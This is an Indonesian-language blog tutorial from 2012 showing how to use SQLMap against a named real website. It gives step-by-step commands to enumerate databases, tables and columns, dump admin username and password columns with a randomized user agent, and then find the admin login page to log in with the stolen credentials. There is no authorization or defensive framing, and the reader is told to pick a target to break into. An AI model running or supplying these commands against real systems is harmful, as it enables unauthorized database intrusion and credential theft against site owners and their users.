Monday, October 29, 2012

Home » » Tutorial SQLMAP Dasar + Cari Page Admin

Tutorial SQLMAP Dasar + Cari Page Admin

8:42:00 PM    No comments

Lets begin !

Alat :
- Python
- SQLMap
- Pemahaman :3

Requirement :
- Windows
- Backtrack

How To :
1. Cari dulu target / web yang mau dipepes :3

2. Kalo udah ketemu, masukin folder SQLMap di tempat yg gampang aksesnya (biar ga ribet)...
Contoh :
Windows :
masukin folder SQLMap ke C:\Python27\tools\
(biar gampang bukanya :3)
nanti tinggal :
cd Python27
cd tools
cd sqlmap
beres :3

untuk Backtrack :
ch0c0@r00t :~$ cd /pentest/database/sqlmap/

3. kalo udah, tinggal kita coba scan target yang vuln =))
contoh : http://snakedancecondos.com/pages.php?id=10
lalu scan pake command :
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session

Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session

*Ket :
-u : url address yang vulnerable
--dbs : mencari database dari target vuln
--random-agent : menggunakan user agent secara acak
--flush-session : menggunakan tehnik injeksi lain jika target ga vulnerable pake injeksi biasa

hasilnya, ketemu dibawah sendiri :3
Database :
- xxxxxxxxxxx
- information_schema

4. kalo udah ketemu, tinggal kita cari tablenya Big Grin
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxx --tables --time-sec=5 --random-agent

Backtrack :
.sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --tables --random-agent --time-sec=5

**ket :
-D : menggunakan database yang ditemukan sebagai titik scanner
--tables : mencari data table yang ada pada database (-D)
--time-sec=5 : menentukan timing scanner dari sqlmap (5 aja defaultnya kalo mau diganti bisa diganti Smile )

dan hasilnya juga ketemu dibawah sendiri :3
Table Found :
-------------------------------
-------------------------------
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
-------------------------------
-------------------------------

5. Nahh, kalo udah kaya gini tinggal scan column aja Smile
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent

Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent

**Ket :
-T : table yang digunakan untuk titik scanning
--columns : mencari data columns yang terdapat pada data table

nahh, nanti munculnya kaya begini Big Grin :
Columns Found :
-------------------------------
-------------------------------
--- -xxxxxxx_admin ---
--- -xxxxxxx_password ---
--- -xxxxxxx_id ---
--- -xxxxxxx ---
-------------------------------
-------------------------------

6. Kalo udah, kita tinggal dump columnnya aja :V
xixixiixixiii....
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx --dump --random-agent --time-sec=5

Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx_admin --dump --random-agent --time-sec=5

**Ket :
-C xxxxxx_admin : Mencari isi data dari column yang terdapat pada column xxxxxx_admin
--dump : menampilkan hasil dari data column.

**Note :
waktu nyecan, bila muncul pertanyaan, antara suruh milih angka 1 atau 2...
pilih aja angka 1, karena kalo milih angka 2, akan melakukan dump pada semua column ( butuh waktu lama :3 )

dan, munculnya :
-------------------------------
-------------------------------
--- ---
--- -xxxxxxx_admin ---
-------------------------------
-------------------------------

yah begitulah Big Grin
sama cara untuk mencari data column yang lainnya :3


++ Cara Mencari Admin Page SQL Injection ++
ini cara yang paling penting :3
kalo udah dapet username + password admin, tinggal scan page adminnya, caranya :

Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent

Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent

**Ket :
--search : mencari sebuah data, antara table dan column (terserah penempatan mau ditaruh diantara -T*tables* atau -C*columns*) karena fungsi utama --search adalah mencari data tertentu dari tables atau column :3


Cara ke 2 : Mencari admin dengan Logika
cara ini emang lumayan ampuh :3
untuk mencari page/halaman admin
Logika :
kalo username yang ketemu : admin
maka kalo dicoba, pasti akan sama dengan halaman admin..
contoh :
user : admin
pass : admin123
maka halaman loginnya : http://snakedancecondos.com/admin

dan voila, pasti ketemu :3

Logikanya, mencari page/halaman admin itu susah2 gampang :3
penting, kita bisa mengkreasikan tehnik tersebut Big Grin


Sekian dari aq, Ch0c0 ...
maaf kalo artikelnya panjang Big Grin
soalnya biar kita ngerti, dasar2nya dalam penggunaannya dan gampang untuk mengkreasikan penggunaanya jadi lebih ampuh Big Grin
ga asal pake :3
xixixixixixixiii :v

Thanks :3

Learn to be better... Wink
be a yourself bro Smile
and customize your style Wink

SUMBER : OM CH0C0 a.k.a Egar

0 komentar:

Post a Comment